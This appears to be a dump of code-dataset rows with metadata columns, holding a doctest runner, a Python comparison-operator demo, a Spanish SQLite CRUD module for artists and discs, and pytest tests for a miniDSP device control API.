| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ac67a2c119c67c319f65355d2eeb0162bdbc6c7d
| 75
|
py
|
Python
|
week13/bonus-tasks/lists_and_digits/tests.py
|
YAtOff/python0
|
b5af5004131d64dd52d42746eddb72b6c43a13c7
|
[
"Apache-2.0"
] | 6
|
2017-11-08T14:04:39.000Z
|
2019-03-24T22:11:04.000Z
|
archive/2016/projects/easy/lists_and_digits/tests.py
|
YAtOff/python0
|
b5af5004131d64dd52d42746eddb72b6c43a13c7
|
[
"Apache-2.0"
] | null | null | null |
archive/2016/projects/easy/lists_and_digits/tests.py
|
YAtOff/python0
|
b5af5004131d64dd52d42746eddb72b6c43a13c7
|
[
"Apache-2.0"
] | 7
|
2015-10-27T09:04:58.000Z
|
2019-03-03T14:18:26.000Z
|
import doctest

import lists_and_digits

# Run every doctest example embedded in lists_and_digits' docstrings.
doctest.testmod(m=lists_and_digits)
| 12.5
| 33
| 0.866667
| 11
| 75
| 5.545455
| 0.545455
| 0.262295
| 0.459016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093333
| 75
| 5
| 34
| 15
| 0.897059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ac691e4b88d3432f5de3411f4617ebb4c59a2cf8
| 346
|
py
|
Python
|
operators/examples/ComparisonOperators.py
|
lakshyamutneja/PyFlask_2k18
|
ab5d6bc4d87ee4829ad8b3553902bb0d346dcb7a
|
[
"MIT"
] | 98
|
2018-09-26T17:45:50.000Z
|
2020-04-08T17:54:50.000Z
|
operators/examples/ComparisonOperators.py
|
lakshyamutneja/PyFlask_2k18
|
ab5d6bc4d87ee4829ad8b3553902bb0d346dcb7a
|
[
"MIT"
] | 12
|
2018-09-29T18:53:31.000Z
|
2018-12-21T05:59:38.000Z
|
operators/examples/ComparisonOperators.py
|
lakshyamutneja/PyFlask_2k18
|
ab5d6bc4d87ee4829ad8b3553902bb0d346dcb7a
|
[
"MIT"
] | 36
|
2018-09-26T20:31:58.000Z
|
2020-10-08T07:01:09.000Z
|
# Comparison operators in Python
x = 10
y = 12

# Evaluate each comparison once, then print every result in the same
# "x <op> y is <bool>" form the original emitted line by line.
for op, outcome in (
    ('>', x > y),    # False
    ('<', x < y),    # True
    ('==', x == y),  # False
    ('!=', x != y),  # True
    ('>=', x >= y),  # False
    ('<=', x <= y),  # True
):
    print('x {} y is'.format(op), outcome)
| 15.727273
| 32
| 0.537572
| 74
| 346
| 2.513514
| 0.175676
| 0.193548
| 0.258065
| 0.322581
| 0.822581
| 0.822581
| 0.822581
| 0.822581
| 0.822581
| 0.822581
| 0
| 0.015326
| 0.245665
| 346
| 22
| 33
| 15.727273
| 0.697318
| 0.488439
| 0
| 0
| 0
| 0
| 0.317647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.75
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
3baab36321ca977fef1fd45afe9cc2ea35384f46
| 9,276
|
py
|
Python
|
Ago-Dic-2019/Ricardo_Romero_Medina/SegundoParcial/basedatos.py
|
Arbupa/DAS_Sistemas
|
52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1
|
[
"MIT"
] | 41
|
2017-09-26T09:36:32.000Z
|
2022-03-19T18:05:25.000Z
|
Ago-Dic-2019/Ricardo_Romero_Medina/SegundoParcial/basedatos.py
|
Arbupa/DAS_Sistemas
|
52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1
|
[
"MIT"
] | 67
|
2017-09-11T05:06:12.000Z
|
2022-02-14T04:44:04.000Z
|
Ago-Dic-2019/Ricardo_Romero_Medina/SegundoParcial/basedatos.py
|
Arbupa/DAS_Sistemas
|
52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1
|
[
"MIT"
] | 210
|
2017-09-01T00:10:08.000Z
|
2022-03-19T18:05:12.000Z
|
import sqlite3
def crear_base_datos():
    """Open (implicitly creating) parcial2.db and print the SQLite version."""
    conexion = None  # defined up-front: otherwise `finally` raises NameError if connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado a SQLite')
        cursor.execute('SELECT sqlite_version();')
        row = cursor.fetchall()
        print('Version de SQLite: ', row)
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
            print('Conexion a SQLite cerrada\n')
def crear_tabala_artistas():
    """Create the `artistas` table in parcial2.db if it does not yet exist.

    (Name kept as-is — "tabala" — because callers import it by this name.)
    """
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado a SQLite')
        query = '''
            CREATE TABLE IF NOT EXISTS artistas(
                Id TEXT PRIMARY KEY NOT NULL,
                Banda TEXT NOT NULL,
                Tipo TEXT NOT NULL,
                Tag TEXT NOT NULL,
                Area TEXT NOT NULL
            );
        '''
        cursor.execute(query)
        row = cursor.fetchall()  # empty for DDL; kept so the printed output is unchanged
        print('Tabla creada correctamente', row)
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
            print('Conexion a SQLite cerrada\n')
def crear_tabala_discos():
    """Create the `disco` table in parcial2.db if it does not yet exist."""
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado a SQLite')
        query = '''
            CREATE TABLE IF NOT EXISTS disco(
                Id TEXT PRIMARY KEY NOT NULL,
                Banda TEXT NOT NULL,
                Titulo TEXT NOT NULL,
                Pais TEXT NOT NULL,
                Status TEXT NOT NULL
            );
        '''
        cursor.execute(query)
        row = cursor.fetchall()  # empty for DDL; kept so the printed output is unchanged
        print('Tabla creada correctamente', row)
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
            print('Conexion a SQLite cerrada\n')
def agregar_artista(banda):
    """Insert one artist row built from `banda`'s _Id/_Banda/_Tipo/_Tag/_Area attributes.

    Uses `?` placeholders instead of str.format so attribute values cannot
    inject SQL or break the statement on quotes.
    """
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado')
        query = 'INSERT INTO artistas VALUES (?, ?, ?, ?, ?)'
        resultado = cursor.execute(
            query, (banda._Id, banda._Banda, banda._Tipo, banda._Tag, banda._Area))
        conexion.commit()
        print('Valor Insertado Correctamente', resultado)
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
            print('Conexion a SQLite cerrada\n')
def agregar_discos(album):
    """Insert one disc row built from `album`'s _Id/_Banda/_Titulo/_Pais/_Status attributes.

    Parameterized (`?` placeholders) to avoid SQL injection / quote breakage.
    """
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado')
        query = 'INSERT INTO disco VALUES (?, ?, ?, ?, ?)'
        resultado = cursor.execute(
            query, (album._Id, album._Banda, album._Titulo, album._Pais, album._Status))
        conexion.commit()
        print('Valor Insertado Correctamente', resultado)
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
            print('Conexion a SQLite cerrada\n')
def Ver_Todos_Artistas():
    """Print every row of `artistas` (count, then one formatted block per row)."""
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado')
        cursor.execute('SELECT * FROM artistas;')
        rows = cursor.fetchall()
        print('Total de registros: ', len(rows))
        print('------------Registros-------------')
        for row in rows:
            print('Id: {}\nBanda: {}\nTipo: {}\nTag: {}\nArea: {}'.format(*row))
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
def Ver_Artista():
    """Return the list of band names in `artistas`; returns None on a DB error."""
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado')
        cursor.execute('SELECT Banda FROM artistas;')
        rows = cursor.fetchall()
        print('Total de registros: ', len(rows))
        print('------------Registros-------------')
        lista = [row[0] for row in rows]
        cursor.close()
        return lista
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
def Ver_Un_Artista(banda):
    """Print every `artistas` row whose Banda equals `banda` (parameterized query)."""
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado')
        # `?` placeholder instead of str.format: no SQL injection via `banda`
        cursor.execute('SELECT * FROM artistas WHERE banda = ?;', (banda,))
        rows = cursor.fetchall()
        print('Total de registros: ', len(rows))
        print('------------Registros-------------')
        for row in rows:
            print('Id: {}\nBanda: {}\nTipo: {}\nTag: {}\nArea: {}'.format(*row))
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
def Ver_Discos(banda):
    """Print every `disco` row for the given band.

    Fixes two defects: the query now selects all five columns (the original
    selected only Titulo yet formatted five fields, raising IndexError on any
    row), and `banda` is bound via a `?` placeholder instead of str.format.
    """
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado')
        cursor.execute('SELECT * FROM disco WHERE banda = ?;', (banda,))
        rows = cursor.fetchall()
        print('Total de registros: ', len(rows))
        print('------------Registros-------------')
        for row in rows:
            print('Id: {}\nBanda: {}\nTitulo: {}\nPais: {}\nStatus: {}'.format(*row))
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
def Ver_Discos_Id_Banda(banda, titulo, id):
    """Print `disco` rows matching (banda AND titulo) OR id.

    Fixes: selects all five columns (the original selected only Titulo yet
    formatted five fields → IndexError on any row) and binds all three values
    via `?` placeholders. The AND-before-OR precedence of the original WHERE
    clause is preserved unchanged.
    """
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado')
        cursor.execute(
            'SELECT * FROM disco WHERE banda = ? and Titulo = ? or Id = ?;',
            (banda, titulo, id))
        rows = cursor.fetchall()
        print('Total de registros: ', len(rows))
        print('------------Registros-------------')
        for row in rows:
            print('Id: {}\nBanda: {}\nTitulo: {}\nPais: {}\nStatus: {}'.format(*row))
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
def Ver_Bandas_Totales():
    """Print the total number of rows in `artistas`."""
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado')
        cursor.execute('SELECT Banda FROM artistas;')
        rows = cursor.fetchall()
        print('Total de registros: ', len(rows))
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
def Ver_Discos_x_Banda(banda):
    """Print Banda/Titulo of every `disco` row for the given band.

    Fixes: the original selected one column but formatted two, indexed a tuple
    row with a string key (`row['Banda']` → uncaught TypeError), and built the
    SQL with str.format. Now selects both printed columns and binds `banda`
    via a `?` placeholder; the broken `'Banda' != row['Banda']` check (an
    always-true header-skip attempt) is dropped.
    """
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado')
        cursor.execute('SELECT Banda, Titulo FROM disco WHERE banda = ?;', (banda,))
        rows = cursor.fetchall()
        print('Total de registros: ', len(rows))
        for row in rows:
            print('Banda: {}\nTitulo: {}\n'.format(*row))
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
def Ver_Artistas_x_Tag(tag):
    """Print every `artistas` row with the given tag (parameterized query)."""
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado')
        # `?` placeholder instead of str.format: no SQL injection via `tag`
        cursor.execute('SELECT * FROM artistas WHERE tag = ?;', (tag,))
        rows = cursor.fetchall()
        print('Total de registros: ', len(rows))
        print('------------Registros-------------')
        for row in rows:
            print('Id: {}\nBanda: {}\nTipo: {}\nTag: {}\nArea: {}'.format(*row))
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
def Ver_Todos_Discos():
    """Print every row of `disco` (count, then one formatted block per row)."""
    conexion = None  # guard: `finally` must not NameError when connect() fails
    try:
        conexion = sqlite3.connect('parcial2.db')
        cursor = conexion.cursor()
        print('Conectado')
        cursor.execute('SELECT * FROM disco;')
        rows = cursor.fetchall()
        print('Total de registros: ', len(rows))
        print('------------Registros-------------')
        for row in rows:
            print('Id: {}\nBanda: {}\nTitulo: {}\nPais: {}\nStatus: {}'.format(*row))
        cursor.close()
    except sqlite3.Error as error:
        print('Error con la conexion', error)
    finally:
        if conexion:
            conexion.close()
| 27.362832
| 123
| 0.535899
| 943
| 9,276
| 5.231177
| 0.099682
| 0.031218
| 0.051085
| 0.070951
| 0.896412
| 0.896412
| 0.896412
| 0.888303
| 0.888303
| 0.888303
| 0
| 0.006962
| 0.318672
| 9,276
| 339
| 124
| 27.362832
| 0.773576
| 0
| 0
| 0.834615
| 0
| 0
| 0.279724
| 0.025655
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053846
| false
| 0
| 0.003846
| 0
| 0.061538
| 0.234615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3be4738636d61ac8d23241aedddb2599f0418efb
| 38,783
|
py
|
Python
|
tests/test_minidsp_api.py
|
3ll3d00d/ezbeq
|
d1408297a95f7b811628175896ea917a465f36a2
|
[
"MIT"
] | 6
|
2021-01-16T18:34:30.000Z
|
2022-01-23T20:30:57.000Z
|
tests/test_minidsp_api.py
|
3ll3d00d/ezbeq
|
d1408297a95f7b811628175896ea917a465f36a2
|
[
"MIT"
] | 45
|
2021-01-16T09:35:35.000Z
|
2022-01-27T19:46:14.000Z
|
tests/test_minidsp_api.py
|
3ll3d00d/ezbeq
|
d1408297a95f7b811628175896ea917a465f36a2
|
[
"MIT"
] | 5
|
2021-01-16T21:42:32.000Z
|
2022-01-29T16:28:10.000Z
|
import json
import os
from typing import Tuple, List
import pytest
from conftest import MinidspSpyConfig, MinidspSpy
def verify_slot(slot: dict, idx: int, active: bool = False, gain: Tuple[float, float] = (0.0, 0.0),
                mute: Tuple[bool, bool] = (False, False), last: str = 'Empty'):
    """Assert that one slot payload matches the expected per-slot state."""
    expected = {
        'id': str(idx),
        'active': active,
        'gain1': gain[0],
        'gain2': gain[1],
        'mute1': mute[0],
        'mute2': mute[1],
        'last': last,
    }
    for key, value in expected.items():
        assert slot[key] == value
    # every slot in these tests is expected to be activatable
    assert slot['canActivate'] is True
def verify_default_device_state(devices: dict):
    """Assert the factory state: master defaults, slot 1 active, all slots empty."""
    for position, slot in enumerate(verify_master_device_state(devices), start=1):
        verify_slot(slot, position, active=position == 1)
def verify_master_device_state(devices, mute: bool = False, gain: float = 0.0):
    """Assert master-level mute/volume, then return the four slot payloads."""
    assert devices
    assert devices['mute'] == mute
    # masterVolume arrives as a string in the payload; compare numerically
    assert float(devices['masterVolume']) == gain
    slots = devices['slots']
    assert slots
    assert len(slots) == 4
    return slots
def test_devices(minidsp_client, minidsp_app):
    """GET /api/1/devices returns 200 with the default (factory) device state."""
    # minidsp_client / minidsp_app are pytest fixtures — presumably provided by
    # conftest alongside MinidspSpyConfig; confirm against conftest.
    assert isinstance(minidsp_app.config['APP_CONFIG'], MinidspSpyConfig)
    r = minidsp_client.get("/api/1/devices")
    assert r
    assert r.status_code == 200
    verify_default_device_state(r.json)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_legacy_mute_both_inputs(minidsp_client, minidsp_app, slot, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': '0',
'value': mute_op,
'command': 'mute'
}
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
verify_mute_both_inputs(config, mute_op, r, slot)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_mute_both_inputs(minidsp_client, minidsp_app, slot, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
call = minidsp_client.put if mute_op == 'on' else minidsp_client.delete
r = call(f"/api/1/devices/master/mute/{slot}")
verify_mute_both_inputs(config, mute_op, r, slot)
def verify_mute_both_inputs(config, mute_op, r, slot):
    """Check a both-channel mute call: 200, two `input N mute` commands, state updated."""
    assert r
    assert r.status_code == 200
    cmds = verify_cmd_count(config.spy, slot, 2)
    for channel in (0, 1):
        assert cmds[channel] == f"input {channel} mute {mute_op}"
    muted = (True, True) if mute_op == 'on' else (False, False)
    for idx, s in enumerate(verify_master_device_state(r.json)):
        if idx == slot - 1:
            verify_slot(s, idx + 1, active=True, mute=muted)
        else:
            verify_slot(s, idx + 1)
def verify_cmd_count(spy: MinidspSpy, slot: int, expected_cmd_count: int, initial_slot=1) -> List[str]:
    """Drain the spy and assert the command count, then return the commands.

    When the target slot differs from the currently-active one, the device is
    expected to emit exactly one leading `config <slot-1>` command; that
    command is stripped from the returned list.
    """
    cmds = spy.take_commands()
    if slot != initial_slot:
        assert len(cmds) == expected_cmd_count + 1
        assert cmds[0] == f"config {slot - 1}"
        return cmds[1:] if expected_cmd_count > 0 else []
    assert len(cmds) == expected_cmd_count
    return cmds
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("channel", [1, 2])
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_legacy_mute_single_input(minidsp_client, minidsp_app, slot, channel, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': f"{channel}",
'value': mute_op,
'command': 'mute'
}
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
verify_mute_single_input(channel, config, mute_op, r, slot)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("channel", [1, 2])
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_mute_single_input(minidsp_client, minidsp_app, slot, channel, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
call = minidsp_client.put if mute_op == 'on' else minidsp_client.delete
r = call(f"/api/1/devices/master/mute/{slot}/{channel}")
verify_mute_single_input(channel, config, mute_op, r, slot)
def verify_mute_single_input(channel, config, mute_op, r, slot):
assert r
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 1)
assert cmds[0] == f"input {channel - 1} mute {mute_op}"
slots = verify_master_device_state(r.json)
if mute_op == 'on':
mute = (True, False) if channel == 1 else (False, True)
else:
mute = (False, False)
for idx, s in enumerate(slots):
if idx == slot - 1:
verify_slot(s, idx + 1, active=True, mute=mute)
else:
verify_slot(s, idx + 1)
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_legacy_mute_master(minidsp_client, minidsp_app, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': 'master',
'value': mute_op,
'command': 'mute'
}
r = minidsp_client.put(f"/api/1/device/0", data=json.dumps(payload), content_type='application/json')
verify_mute_master(config, mute_op, r)
@pytest.mark.parametrize("mute_op", ['on', 'off'])
def test_mute_master(minidsp_client, minidsp_app, mute_op):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
call = minidsp_client.put if mute_op == 'on' else minidsp_client.delete
r = call(f"/api/1/devices/master/mute")
verify_mute_master(config, mute_op, r)
def verify_mute_master(config, mute_op, r):
assert r
assert r.status_code == 200
cmds = config.spy.take_commands()
assert len(cmds) == 1
assert cmds[0] == f"mute {mute_op}"
slots = verify_master_device_state(r.json, mute=True if mute_op == 'on' else False)
for idx, s in enumerate(slots):
verify_slot(s, idx + 1, active=idx == 0)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, False), (0.5, True), (12.4, False)])
def test_legacy_set_input_gain(minidsp_client, minidsp_app, slot, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': '0',
'value': gain,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
verify_set_input_gain(config, gain, is_valid, r, slot)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, False), (0.5, True), (12.4, False)])
def test_set_input_gain(minidsp_client, minidsp_app, slot, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {'gain': gain}
r = minidsp_client.put(f"/api/1/devices/master/gain/{slot}", data=json.dumps(payload),
content_type='application/json')
verify_set_input_gain(config, gain, is_valid, r, slot)
def verify_set_input_gain(config, gain, is_valid, r, slot):
assert r
if is_valid:
expected_gain = (gain, gain)
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 2)
assert cmds[0] == f"input 0 gain -- {gain:.2f}"
assert cmds[1] == f"input 1 gain -- {gain:.2f}"
else:
expected_gain = (0.0, 0.0)
assert r.status_code == 400
cmds = config.spy.take_commands()
assert len(cmds) == 0
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
slot_is_active = idx == slot - 1 if is_valid else idx == 0
if idx == slot - 1:
verify_slot(s, idx + 1, active=slot_is_active, gain=expected_gain)
else:
verify_slot(s, idx + 1, active=slot_is_active)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("channel", [1, 2])
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, False), (0.5, True), (12.4, False)])
def test_legacy_set_input_gain_single_input(minidsp_client, minidsp_app, slot, channel, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': channel,
'value': gain,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
verify_set_input_gain_single_input(channel, config, gain, is_valid, r, slot)
@pytest.mark.parametrize("slot", [1, 2, 3, 4])
@pytest.mark.parametrize("channel", [1, 2])
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, False), (0.5, True), (12.4, False)])
def test_set_input_gain_single_input(minidsp_client, minidsp_app, slot, channel, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {'gain': gain}
r = minidsp_client.put(f"/api/1/devices/master/gain/{slot}/{channel}", data=json.dumps(payload),
content_type='application/json')
verify_set_input_gain_single_input(channel, config, gain, is_valid, r, slot)
def verify_set_input_gain_single_input(channel, config, gain, is_valid, r, slot):
assert r
if is_valid:
expected_gain = (gain, 0.0) if channel == 1 else (0.0, gain)
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 1)
assert cmds[0] == f"input {channel - 1} gain -- {gain:.2f}"
else:
expected_gain = (0.0, 0.0)
assert r.status_code == 400
cmds = config.spy.take_commands()
assert len(cmds) == 0
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
slot_is_active = idx == slot - 1 if is_valid else idx == 0
if idx == slot - 1:
verify_slot(s, idx + 1, active=slot_is_active, gain=expected_gain)
else:
verify_slot(s, idx + 1, active=slot_is_active)
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, True), (0.5, False), (-128.0, False)])
def test_legacy_set_master_gain(minidsp_client, minidsp_app, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'channel': 'master',
'value': gain,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/0", data=json.dumps(payload), content_type='application/json')
verify_set_master_gain(config, gain, is_valid, r)
@pytest.mark.parametrize("gain,is_valid", [(-14.2, True), (-49.1, True), (-72.1, True), (0.5, False), (-128.0, False)])
def test_set_master_gain(minidsp_client, minidsp_app, gain, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {'gain': gain}
r = minidsp_client.put(f"/api/1/devices/master/gain", data=json.dumps(payload), content_type='application/json')
verify_set_master_gain(config, gain, is_valid, r)
def verify_set_master_gain(config, gain, is_valid, r):
assert r
if is_valid:
assert r.status_code == 200
cmds = config.spy.take_commands()
assert len(cmds) == 1
assert cmds[0] == f"gain -- {gain:.2f}"
else:
assert r.status_code == 400
cmds = config.spy.take_commands()
assert len(cmds) == 0
slots = verify_master_device_state(r.json, gain=gain if is_valid else 0.0)
for idx, s in enumerate(slots):
verify_slot(s, idx + 1, active=idx == 0)
@pytest.mark.parametrize("slot,is_valid", [(0, False), (1, True), (2, True), (3, True), (4, True), (5, False)])
def test_legacy_activate_slot(minidsp_client, minidsp_app, slot, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
payload = {
'command': 'activate'
}
r = minidsp_client.put(f"/api/1/device/{slot}", data=json.dumps(payload), content_type='application/json')
verify_activate_slot(config, is_valid, r, slot)
@pytest.mark.parametrize("slot,is_valid", [(0, False), (1, True), (2, True), (3, True), (4, True), (5, False)])
def test_activate_slot(minidsp_client, minidsp_app, slot, is_valid):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
r = minidsp_client.put(f"/api/1/devices/master/config/{slot}/active")
verify_activate_slot(config, is_valid, r, slot)
def verify_activate_slot(config, is_valid, r, slot):
assert r
if is_valid:
assert r.status_code == 200
cmds = verify_cmd_count(config.spy, slot, 0)
else:
assert r.status_code == 400
cmds = config.spy.take_commands()
assert len(cmds) == 0
slots = verify_master_device_state(r.json)
for idx, s in enumerate(slots):
if is_valid:
verify_slot(s, idx + 1, active=idx + 1 == slot)
else:
verify_slot(s, idx + 1, active=idx == 0)
def test_legacy_state_maintained_over_multiple_updates(minidsp_client, minidsp_app):
config: MinidspSpyConfig = minidsp_app.config['APP_CONFIG']
assert isinstance(config, MinidspSpyConfig)
# when: activate slot 2
r = minidsp_client.put(f"/api/1/device/2", data=json.dumps({'command': 'activate'}),
content_type='application/json')
assert r.status_code == 200
# and: set master gain
gain_payload = {
'channel': 'master',
'value': -10.2,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/0", data=json.dumps(gain_payload), content_type='application/json')
assert r.status_code == 200
# and: set input gain on slot 3
gain_payload = {
'channel': '0',
'value': 5.1,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/3", data=json.dumps(gain_payload), content_type='application/json')
assert r.status_code == 200
# and: set input gain on one channel on slot 3
gain_payload = {
'channel': '2',
'value': 6.1,
'command': 'gain'
}
r = minidsp_client.put(f"/api/1/device/3", data=json.dumps(gain_payload), content_type='application/json')
assert r.status_code == 200
# then: expected commands are sent
cmds = config.spy.take_commands()
assert len(cmds) == 6
assert cmds[0] == "config 1"
assert cmds[1] == "gain -- -10.20"
assert cmds[2] == "config 2"
assert cmds[3] == "input 0 gain -- 5.10"
assert cmds[4] == "input 1 gain -- 5.10"
assert cmds[5] == "input 1 gain -- 6.10"
# and: device state is accurate
slots = verify_master_device_state(r.json, gain=-10.2)
verify_slot(slots[0], 1)
verify_slot(slots[1], 2)
verify_slot(slots[2], 3, active=True, gain=(5.10, 6.10))
verify_slot(slots[3], 4)
